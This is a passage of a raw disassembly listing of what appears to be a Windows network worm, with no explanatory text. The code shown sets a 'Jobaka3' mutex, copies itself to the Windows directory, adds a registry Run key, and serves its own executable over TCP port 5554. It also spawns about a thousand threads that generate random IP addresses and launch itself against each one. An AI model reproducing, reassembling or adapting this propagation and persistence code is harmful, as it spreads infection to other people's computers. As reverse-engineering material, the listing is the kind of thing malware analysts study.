cmp ebx, 0FFFFFFFFh
mov [ebp+var_C], ebx
jz loc_401DB9
lea eax, [ebp+var_28]
push 10h
push eax
push ebx
call dword_4050FC
cmp eax, 0FFFFFFFFh
jnz short loc_401D44
push ebx
call dword_40511C
jmp short loc_401DB9
; ---------------------------------------------------------------------------
loc_401D44: ; CODE XREF: sub_401B08+231�j
lea eax, [ebp+var_8E4]
push 400h
push eax
push 0
call dword_405034 ; GetModuleFileNameA
lea eax, [ebp+var_8E4]
push 0
push eax
call dword_405030 ; _lopen
cmp eax, 0FFFFFFFFh
mov [ebp+var_8], eax
jz short loc_401DB9
lea eax, [ebp+var_2]
push offset dword_406F38
push eax
call sub_402720
mov ebx, dword_40502C
pop ecx
pop ecx
lea eax, [ebp+var_2]
push 1
push eax
push [ebp+var_8]
loc_401D8E: ; CODE XREF: sub_401B08+2A6�j
call ebx ; dword_40502C
cmp eax, 1
jnz short loc_401DB0
and [ebp+var_1], 0
push 0
push eax
lea eax, [ebp+var_2]
push eax
push [ebp+var_C]
call esi ; dword_4050F0
lea eax, [ebp+var_2]
push 1
push eax
push [ebp+var_8]
jmp short loc_401D8E
; ---------------------------------------------------------------------------
loc_401DB0: ; CODE XREF: sub_401B08+28B�j
push [ebp+var_8]
call dword_40501C ; _lclose
loc_401DB9: ; CODE XREF: sub_401B08+1DD�j
; sub_401B08+21B�j ...
push [ebp+var_C]
call dword_40511C
push 0
push off_4068DC
call sub_402210
pop ecx
push eax
push off_4068DC
loc_401DD7: ; CODE XREF: sub_401B08+197�j
push [ebp+arg_0]
jmp short loc_401E12
; ---------------------------------------------------------------------------
loc_401DDC: ; CODE XREF: sub_401B08+1B1�j
lea eax, [ebp+var_4E4]
push offset aQuit ; "QUIT"
push eax
call sub_402600
pop ecx
test eax, eax
pop ecx
jz short loc_401DFC
push ebx
call dword_40511C
jmp short loc_401E14
; ---------------------------------------------------------------------------
loc_401DFC: ; CODE XREF: sub_401B08+2E9�j
push 0
push off_4068DC
call sub_402210
pop ecx
push eax
push off_4068DC
loc_401E11: ; CODE XREF: sub_401B08+8A�j
; sub_401B08+BB�j
push ebx
loc_401E12: ; CODE XREF: sub_401B08+2D2�j
call esi ; dword_4050F0
loc_401E14: ; CODE XREF: sub_401B08+2F2�j
cmp [ebp+var_10], 0
jg loc_401B43
push [ebp+arg_0]
call dword_40511C
pop edi
pop esi
loc_401E29: ; CODE XREF: sub_401B08+10�j
xor eax, eax
pop ebx
leave
retn 4
sub_401B08 endp
; =============== S U B R O U T I N E =======================================
sub_401E30 proc near ; CODE XREF: sub_401B08+119�p
; sub_401B08+129�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
xor edi, edi
loc_401E38: ; CODE XREF: sub_401E30+13�j
mov al, [esi]
cmp al, 20h
jz short loc_401E42
cmp al, 9
jnz short loc_401E45
loc_401E42: ; CODE XREF: sub_401E30+C�j
inc esi
jmp short loc_401E38
; ---------------------------------------------------------------------------
loc_401E45: ; CODE XREF: sub_401E30+10�j
; sub_401E30+2E�j
movsx eax, byte ptr [esi]
push eax
call sub_402810
test eax, eax
pop ecx
jz short loc_401E60
movsx ecx, byte ptr [esi]
lea eax, [edi+edi*4]
inc esi
lea edi, [ecx+eax*2-30h]
jmp short loc_401E45
; ---------------------------------------------------------------------------
loc_401E60: ; CODE XREF: sub_401E30+21�j
mov eax, edi
pop edi
pop esi
retn
sub_401E30 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401E65 proc near ; DATA XREF: sub_402029+79�o
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 14h
push esi
xor esi, esi
push edi
push esi
push 1
push 2
call dword_4050F8
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_401E89
loc_401E81: ; CODE XREF: sub_401E65+63�j
pop edi
xor eax, eax
pop esi
leave
retn 4
; ---------------------------------------------------------------------------
loc_401E89: ; CODE XREF: sub_401E65+1A�j
push 15B2h
mov [ebp+var_14], 2
call dword_4050F4
mov [ebp+var_12], ax
lea eax, [ebp+var_14]
push 10h
push eax
push edi
mov [ebp+var_10], esi
call dword_405118
cmp eax, 0FFFFFFFFh
jz short loc_401EC1
push 5
push edi
call dword_405100
cmp eax, 0FFFFFFFFh
jnz short loc_401ECA
loc_401EC1: ; CODE XREF: sub_401E65+4C�j
push edi
call dword_40511C
jmp short loc_401E81
; ---------------------------------------------------------------------------
loc_401ECA: ; CODE XREF: sub_401E65+5A�j
; sub_401E65+89�j
push esi
push esi
push edi
call dword_4050E8
lea ecx, [ebp+var_4]
push ecx
push esi
push eax
push offset sub_401B08
push esi
push esi
call dword_405038 ; CreateThread
push 19h
call dword_405028 ; Sleep
jmp short loc_401ECA
sub_401E65 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_401EF0 proc near ; DATA XREF: sub_402029+8D�o
var_454 = byte ptr -454h
var_438 = byte ptr -438h
var_400 = byte ptr -400h
sub esp, 454h
push ebx
push ebp
mov ebp, dword_4050E0
push esi
push edi
mov esi, 0FFh
loc_401F05: ; CODE XREF: sub_401EF0+134�j
lea eax, [esp+464h+var_438]
push eax
call sub_4010D2
pop ecx
lea eax, [esp+464h+var_438]
push eax
call dword_40510C
movsx edi, al
test edi, edi
movsx ebx, ah
jge short loc_401F2B
add edi, 100h
loc_401F2B: ; CODE XREF: sub_401EF0+33�j
test ebx, ebx
jge short loc_401F35
add ebx, 100h
loc_401F35: ; CODE XREF: sub_401EF0+3D�j
call sub_401000
push 1Fh
cdq
pop ecx
idiv ecx
cmp edx, 0Fh
jle short loc_401F92
call sub_401000
push 1Fh
cdq
pop ecx
idiv ecx
cmp edx, 0Fh
jle short loc_401F78
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
jmp short loc_401F8F
; ---------------------------------------------------------------------------
loc_401F78: ; CODE XREF: sub_401EF0+63�j
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
push ebx
loc_401F8F: ; CODE XREF: sub_401EF0+86�j
push edi
jmp short loc_401FBE
; ---------------------------------------------------------------------------
loc_401F92: ; CODE XREF: sub_401EF0+53�j
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
loc_401FBE: ; CODE XREF: sub_401EF0+A0�j
lea eax, [esp+474h+var_454]
push offset aI_I_I_I ; "%i.%i.%i.%i"
push eax
call ebp ; dword_4050E0
add esp, 18h
lea eax, [esp+464h+var_454]
push eax
call sub_401153
cmp al, 1
pop ecx
jnz short loc_40201C
lea eax, [esp+464h+var_400]
push 400h
push eax
push 0
call dword_405034 ; GetModuleFileNameA
lea eax, [esp+464h+var_400]
push offset asc_406A7C ; " "
push eax
call sub_402730
lea eax, [esp+46Ch+var_454]
push eax
lea eax, [esp+470h+var_400]
push eax
call sub_402730
add esp, 10h
lea eax, [esp+464h+var_400]
push 0
push eax
call dword_40503C ; WinExec
loc_40201C: ; CODE XREF: sub_401EF0+EA�j
push 19h
call dword_405028 ; Sleep
jmp loc_401F05
sub_401EF0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402029 proc near ; CODE XREF: .text:00402907�p
var_14 = dword ptr -14h
var_8 = byte ptr -8
var_4 = byte ptr -4
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
push esi
push edi
mov edi, dword_405048
xor esi, esi
push offset aJobaka3 ; "Jobaka3"
push esi
push esi
call edi ; dword_405048
call dword_405044 ; GetTickCount
push eax
call sub_40101E
call sub_401028
push [ebp+arg_8]
call sub_402210
pop ecx
test eax, eax
pop ecx
jbe short loc_402072
push [ebp+arg_8]
call sub_401A84
pop ecx
push 1
pop eax
loc_40206C: ; CODE XREF: sub_402029+6A�j
pop edi
pop esi
leave
retn 10h
; ---------------------------------------------------------------------------
loc_402072: ; CODE XREF: sub_402029+35�j
push 1
call sub_4020D7
mov [esp+14h+var_14], offset aJumpallsnlstil ; "JumpallsNlsTillt"
push esi
push esi
call edi ; dword_405048
call dword_405040 ; RtlGetLastWin32Error
cmp eax, 0B7h
jnz short loc_402095
xor eax, eax
jmp short loc_40206C
; ---------------------------------------------------------------------------
loc_402095: ; CODE XREF: sub_402029+66�j
mov edi, dword_405038
lea eax, [ebp+var_4]
push ebx
push eax
push esi
push esi
push offset sub_401E65
push esi
push esi
call edi ; dword_405038
mov ebx, 400h
loc_4020B0: ; CODE XREF: sub_402029+97�j
lea eax, [ebp+var_8]
push eax
push esi
push esi
push offset sub_401EF0
push esi
push esi
call edi ; dword_405038
dec ebx
jnz short loc_4020B0
pop ebx
loc_4020C3: ; CODE XREF: sub_402029+AC�j
push esi
call dword_405000
push 0BB8h
call dword_405028 ; Sleep
jmp short loc_4020C3
sub_402029 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4020D7 proc near ; CODE XREF: sub_402029+4B�p
var_824 = byte ptr -824h
var_425 = byte ptr -425h
var_424 = byte ptr -424h
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
mov ebp, esp
sub esp, 824h
push esi
mov esi, 400h
lea eax, [ebp+var_824]
push esi
push eax
push 0
call dword_405034 ; GetModuleFileNameA
lea eax, [ebp+var_424]
push esi
push eax
call dword_405050 ; GetWindowsDirectoryA
lea eax, [ebp+var_424]
push eax
call sub_402210
cmp [ebp+eax+var_425], 5Ch
pop ecx
pop esi
jz short loc_40212F
lea eax, [ebp+var_424]
push offset asc_406ACC ; "\\"
push eax
call sub_402730
pop ecx
pop ecx
loc_40212F: ; CODE XREF: sub_4020D7+43�j
push off_4068C8
lea eax, [ebp+var_424]
push eax
call sub_402730
cmp [ebp+arg_0], 0
pop ecx
pop ecx
jz short loc_40215F
lea eax, [ebp+var_424]
push 0
push eax
lea eax, [ebp+var_824]
push eax
call dword_40504C ; CopyFileA
loc_40215F: ; CODE XREF: sub_4020D7+70�j
lea eax, [ebp+var_4]
push eax
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
call dword_405004
lea eax, [ebp+var_424]
push eax
call sub_402210
pop ecx
push eax
lea eax, [ebp+var_424]
push eax
push 1
push 0
push off_4068C8
push [ebp+var_4]
call dword_405008
push [ebp+var_4]
call dword_40500C
leave
retn
sub_4020D7 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4021B0 proc near ; CODE XREF: sub_401153+10�p
; sub_401153+40�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_8]
mov ecx, [esp+arg_0]
test edx, edx
jz short loc_402203
xor eax, eax
mov al, [esp+arg_4]
push edi
mov edi, ecx
cmp edx, 4
jb short loc_4021F7
neg ecx
and ecx, 3
jz short loc_4021D9
sub edx, ecx
loc_4021D3: ; CODE XREF: sub_4021B0+27�j
mov [edi], al
inc edi
dec ecx
jnz short loc_4021D3
loc_4021D9: ; CODE XREF: sub_4021B0+1F�j
mov ecx, eax
shl eax, 8
add eax, ecx
mov ecx, eax
shl eax, 10h
add eax, ecx
mov ecx, edx
and edx, 3
shr ecx, 2
jz short loc_4021F7
rep stosd
test edx, edx
jz short loc_4021FD
loc_4021F7: ; CODE XREF: sub_4021B0+18�j
; sub_4021B0+3F�j ...
mov [edi], al
inc edi
dec edx
jnz short loc_4021F7
loc_4021FD: ; CODE XREF: sub_4021B0+45�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_402203: ; CODE XREF: sub_4021B0+A�j
mov eax, [esp+arg_0]
retn
sub_4021B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402210 proc near ; CODE XREF: sub_401210+3E�p
; sub_401210+55�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
test ecx, 3
jz short loc_402230
loc_40221C: ; CODE XREF: sub_402210+19�j
mov al, [ecx]
inc ecx
test al, al
jz short loc_402263
test ecx, 3
jnz short loc_40221C
add eax, 0
loc_402230: ; CODE XREF: sub_402210+A�j
; sub_402210+36�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_402230
mov eax, [ecx-4]
test al, al
jz short loc_402281
test ah, ah
jz short loc_402277
test eax, 0FF0000h
jz short loc_40226D
test eax, 0FF000000h
jz short loc_402263
jmp short loc_402230
; ---------------------------------------------------------------------------
loc_402263: ; CODE XREF: sub_402210+11�j
; sub_402210+4F�j
lea eax, [ecx-1]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_40226D: ; CODE XREF: sub_402210+48�j
lea eax, [ecx-2]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_402277: ; CODE XREF: sub_402210+41�j
lea eax, [ecx-3]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_402281: ; CODE XREF: sub_402210+3D�j
lea eax, [ecx-4]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
sub_402210 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402290 proc near ; CODE XREF: sub_401398+59�p
; sub_401398+78�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_4022B0
cmp edi, eax
jb loc_402428
loc_4022B0: ; CODE XREF: sub_402290+16�j
test edi, 3
jnz short loc_4022CC
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_4022EC
rep movsd
jmp off_4023D8[edx*4]
; ---------------------------------------------------------------------------
loc_4022CC: ; CODE XREF: sub_402290+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_4022E4
and eax, 3
add ecx, eax
jmp dword ptr loc_4022EC+4[eax*4]
; ---------------------------------------------------------------------------
loc_4022E4: ; CODE XREF: sub_402290+46�j
jmp dword ptr loc_4023E8[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_4022EC: ; CODE XREF: sub_402290+31�j
; sub_402290+8E�j ...
jmp off_40236C[ecx*4]
; ---------------------------------------------------------------------------
db 90h
dd offset loc_402300
dd offset loc_40232C
; ---------------------------------------------------------------------------
push eax
and eax, [eax+0]
loc_402300: ; DATA XREF: sub_402290+64�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_4022EC
rep movsd
jmp off_4023D8[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_40232C: ; DATA XREF: sub_402290+68�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_4022EC
rep movsd
jmp off_4023D8[edx*4]
; ---------------------------------------------------------------------------
align 10h
and edx, ecx
mov al, [esi]
mov [edi], al
inc esi
shr ecx, 2
inc edi
cmp ecx, 8
jb short loc_4022EC
rep movsd
jmp off_4023D8[edx*4]
; ---------------------------------------------------------------------------
align 4
off_40236C dd offset loc_4023CF ; DATA XREF: sub_402290:loc_4022EC�r
dd offset loc_4023BC
dd offset loc_4023B4
dd offset loc_4023AC
dd offset loc_4023A4
dd offset loc_40239C
dd offset loc_402394
dd offset loc_40238C
; ---------------------------------------------------------------------------
loc_40238C: ; CODE XREF: sub_402290:loc_4022EC�j
; DATA XREF: sub_402290+F8�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_402394: ; CODE XREF: sub_402290:loc_4022EC�j
; DATA XREF: sub_402290+F4�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_40239C: ; CODE XREF: sub_402290:loc_4022EC�j
; DATA XREF: sub_402290+F0�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_4023A4: ; CODE XREF: sub_402290:loc_4022EC�j
; DATA XREF: sub_402290+EC�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_4023AC: ; CODE XREF: sub_402290:loc_4022EC�j
; DATA XREF: sub_402290+E8�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_4023B4: ; CODE XREF: sub_402290:loc_4022EC�j
; DATA XREF: sub_402290+E4�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_4023BC: ; CODE XREF: sub_402290:loc_4022EC�j
; DATA XREF: sub_402290+E0�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_4023CF: ; CODE XREF: sub_402290:loc_4022EC�j
; DATA XREF: sub_402290:off_40236C�o
jmp off_4023D8[edx*4]
; ---------------------------------------------------------------------------
align 4
off_4023D8 dd offset loc_4023E8 ; DATA XREF: sub_402290+35�r
; sub_402290+92�r ...
dd offset loc_4023F0
dd offset loc_4023FC
dd offset loc_402410
; ---------------------------------------------------------------------------
loc_4023E8: ; CODE XREF: sub_402290+35�j
; sub_402290+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_4023F0: ; CODE XREF: sub_402290+35�j
; sub_402290+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4023FC: ; CODE XREF: sub_402290+35�j
; sub_402290+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_402410: ; CODE XREF: sub_402290+35�j
; sub_402290+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_402428: ; CODE XREF: sub_402290+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_40245C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_402450
std
rep movsd
cld
jmp off_402570[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_402450: ; CODE XREF: sub_402290+1B1�j
; sub_402290+208�j ...
neg ecx
jmp off_402520[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_40245C: ; CODE XREF: sub_402290+1A6�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_402474
and eax, 3
sub ecx, eax
jmp dword ptr loc_402474+4[eax*4]
; ---------------------------------------------------------------------------
loc_402474: ; CODE XREF: sub_402290+1D6�j
; DATA XREF: sub_402290+1DD�r
jmp off_402570[ecx*4]
; ---------------------------------------------------------------------------
align 4
mov [eax+eax*2], ah
add [eax-2FFFBFDCh], ch
and al, 40h
add [edx-2EDCFCBAh], cl
mov [edi+3], al
dec esi
shr ecx, 2
dec edi
cmp ecx, 8
jb short loc_402450
std
rep movsd
cld
jmp off_402570[edx*4]
; ---------------------------------------------------------------------------
align 4
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_402450
std
rep movsd
cld
jmp off_402570[edx*4]
; ---------------------------------------------------------------------------
align 10h
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_402450
std
rep movsd
cld
jmp off_402570[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_402524
dd offset loc_40252C
dd offset loc_402534
dd offset loc_40253C
dd offset loc_402544
dd offset loc_40254C
dd offset loc_402554
off_402520 dd offset loc_402567 ; DATA XREF: sub_402290+1C2�r
; ---------------------------------------------------------------------------
loc_402524: ; DATA XREF: sub_402290+274�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_40252C: ; DATA XREF: sub_402290+278�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_402534: ; DATA XREF: sub_402290+27C�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_40253C: ; DATA XREF: sub_402290+280�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_402544: ; DATA XREF: sub_402290+284�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_40254C: ; DATA XREF: sub_402290+288�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_402554: ; DATA XREF: sub_402290+28C�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_402567: ; CODE XREF: sub_402290+1C2�j
; DATA XREF: sub_402290:off_402520�o
jmp off_402570[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_402570 dd offset loc_402580 ; DATA XREF: sub_402290+1B7�r
; sub_402290:loc_402474�r ...
dd offset loc_402588
dd offset loc_402598
dd offset loc_4025AC
; ---------------------------------------------------------------------------
loc_402580: ; CODE XREF: sub_402290+1B7�j
; sub_402290:loc_402474�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_402588: ; CODE XREF: sub_402290+1B7�j
; sub_402290:loc_402474�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_402598: ; CODE XREF: sub_402290+1B7�j
; sub_402290:loc_402474�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4025AC: ; CODE XREF: sub_402290+1B7�j
; sub_402290:loc_402474�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_402290 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4025D0 proc near ; CODE XREF: sub_40159E+8�p
; sub_40371C+DF�p ...
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_4025F0
loc_4025DC: ; CODE XREF: sub_4025D0+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_4025DC
loc_4025F0: ; CODE XREF: sub_4025D0+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_4025D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402600 proc near ; CODE XREF: sub_401A84+2D�p
; sub_401A84+50�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
push edi
push ebx
push esi
mov dl, [ecx]
mov edi, [esp+0Ch+arg_0]
test dl, dl
jz short loc_40267A
mov dh, [ecx+1]
test dh, dh
jz short loc_402667
loc_402618: ; CODE XREF: sub_402600+52�j
; sub_402600+65�j
mov esi, edi
mov ecx, [esp+0Ch+arg_4]
mov al, [edi]
inc esi
cmp al, dl
jz short loc_40263A
test al, al
jz short loc_402634
loc_402629: ; CODE XREF: sub_402600+32�j
mov al, [esi]
inc esi
loc_40262C: ; CODE XREF: sub_402600+3F�j
cmp al, dl
jz short loc_40263A
test al, al
jnz short loc_402629
loc_402634: ; CODE XREF: sub_402600+27�j
pop esi
pop ebx
pop edi
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_40263A: ; CODE XREF: sub_402600+23�j
; sub_402600+2E�j
mov al, [esi]
inc esi
cmp al, dh
jnz short loc_40262C
lea edi, [esi-1]
loc_402644: ; CODE XREF: sub_402600+63�j
mov ah, [ecx+2]
test ah, ah
jz short loc_402673
mov al, [esi]
add esi, 2
cmp al, ah
jnz short loc_402618
mov al, [ecx+3]
test al, al
jz short loc_402673
mov ah, [esi-1]
add ecx, 2
cmp al, ah
jz short loc_402644
jmp short loc_402618
; ---------------------------------------------------------------------------
loc_402667: ; CODE XREF: sub_402600+16�j
xor eax, eax
pop esi
pop ebx
pop edi
mov al, dl
jmp sub_402996
; ---------------------------------------------------------------------------
loc_402673: ; CODE XREF: sub_402600+49�j
; sub_402600+59�j
lea eax, [edi-1]
pop esi
pop ebx
pop edi
retn
; ---------------------------------------------------------------------------
loc_40267A: ; CODE XREF: sub_402600+F�j
mov eax, edi
pop esi
pop ebx
pop edi
retn
sub_402600 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402680 proc near ; CODE XREF: sub_401B08+103�p
; sub_401B08+14C�p
var_20 = byte ptr -20h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 20h
push ebx
push esi
mov esi, [ebp+arg_4]
push edi
push 8
xor eax, eax
pop ecx
lea edi, [ebp+var_20]
rep stosd
push 7
pop edi
loc_402699: ; CODE XREF: sub_402680+32�j
mov dl, [esi]
mov bl, 1
movzx ecx, dl
mov eax, ecx
and ecx, edi
shr eax, 3
shl bl, cl
lea eax, [ebp+eax+var_20]
or [eax], bl
inc esi
test dl, dl
jnz short loc_402699
mov edx, [ebp+arg_0]
test edx, edx
jnz short loc_4026C1
mov edx, dword_406F3C
loc_4026C1: ; CODE XREF: sub_402680+39�j
; sub_402680+5F�j
mov al, [edx]
push 1
movzx esi, al
mov ecx, esi
pop ebx
and ecx, edi
shl ebx, cl
shr esi, 3
mov cl, [ebp+esi+var_20]
test bl, cl
jz short loc_4026E1
test al, al
jz short loc_4026E1
inc edx
jmp short loc_4026C1
; ---------------------------------------------------------------------------
loc_4026E1: ; CODE XREF: sub_402680+58�j
; sub_402680+5C�j
mov ebx, edx
loc_4026E3: ; CODE XREF: sub_402680+81�j
mov al, [edx]
test al, al
jz short loc_402707
movzx esi, al
mov ecx, esi
push 1
and ecx, edi
pop eax
shl eax, cl
shr esi, 3
mov cl, [ebp+esi+var_20]
test al, cl
jnz short loc_402703
inc edx
jmp short loc_4026E3
; ---------------------------------------------------------------------------
loc_402703: ; CODE XREF: sub_402680+7E�j
and byte ptr [edx], 0
inc edx
loc_402707: ; CODE XREF: sub_402680+67�j
mov eax, ebx
pop edi
sub eax, edx
pop esi
neg eax
sbb eax, eax
mov dword_406F3C, edx
and eax, ebx
pop ebx
leave
retn
sub_402680 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402720 proc near ; CODE XREF: sub_401B08+E9�p
; sub_401B08+270�p ...
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
jmp short loc_402791
sub_402720 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402730 proc near ; CODE XREF: sub_401EF0+108�p
; sub_401EF0+117�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_0]
push edi
test ecx, 3
jz short loc_40274C
loc_40273D: ; CODE XREF: sub_402730+1A�j
mov al, [ecx]
inc ecx
test al, al
jz short loc_40277F
test ecx, 3
jnz short loc_40273D
loc_40274C: ; CODE XREF: sub_402730+B�j
; sub_402730+32�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_40274C
mov eax, [ecx-4]
test al, al
jz short loc_40278E
test ah, ah
jz short loc_402789
test eax, 0FF0000h
jz short loc_402784
test eax, 0FF000000h
jz short loc_40277F
jmp short loc_40274C
; ---------------------------------------------------------------------------
loc_40277F: ; CODE XREF: sub_402730+12�j
; sub_402730+4B�j
lea edi, [ecx-1]
jmp short loc_402791
; ---------------------------------------------------------------------------
loc_402784: ; CODE XREF: sub_402730+44�j
lea edi, [ecx-2]
jmp short loc_402791
; ---------------------------------------------------------------------------
loc_402789: ; CODE XREF: sub_402730+3D�j
lea edi, [ecx-3]
jmp short loc_402791
; ---------------------------------------------------------------------------
loc_40278E: ; CODE XREF: sub_402730+39�j
lea edi, [ecx-4]
loc_402791: ; CODE XREF: sub_402720+5�j
; sub_402730+52�j ...
mov ecx, [esp+4+arg_4]
test ecx, 3
jz short loc_4027B6
loc_40279D: ; CODE XREF: sub_402730+7D�j
mov dl, [ecx]
inc ecx
test dl, dl
jz short loc_402808
mov [edi], dl
inc edi
test ecx, 3
jnz short loc_40279D
jmp short loc_4027B6
; ---------------------------------------------------------------------------
loc_4027B1: ; CODE XREF: sub_402730+9E�j
; sub_402730+B8�j
